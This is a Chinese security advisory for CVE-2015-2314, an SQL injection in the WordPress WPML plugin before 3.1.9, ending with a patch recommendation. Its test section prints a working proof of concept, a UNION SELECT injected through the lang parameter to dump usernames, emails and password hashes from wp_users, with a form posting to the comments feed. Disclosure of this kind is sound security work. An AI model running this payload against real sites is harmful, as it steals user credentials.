WordPress WPML插件SQL注入漏洞(CVE

发布日期:2015-03-05
更新日期:2015-03-18

受影响系统:
WordPress WPML < 3.1.9
描述:
CVE(CAN) ID: CVE-2015-2314

WPML是创建多语言WordPress站点使用的行业标准。

WPML 3.1.9之前版本在实现上存在sql注入漏洞,通过在comments/feed的wp-link-ajax操作中,发送构造的HTTP Referer标头里的lang参数,远程攻击者利用此漏洞可执行任意sql命令。

<*来源:Jouko Pynnonen (jouko@iki.fi
 
  链接:
 *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jouko Pynnonen (jouko@iki.fi)提供了如下测试方法:

<script>
 var union="select
 user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
 wp_users";
 if (document.location.search.length < 2)
 document.location.search="lang=xx' UNION "+union+" -- -- ";
 </script>

<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
 <input type=hidden name=action value="wp-link-ajax">
 <input type=submit>
 </form>

建议:
厂商补丁:

WordPress
 ---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/e553cc635e256b5cfeae5a9d65df5682.html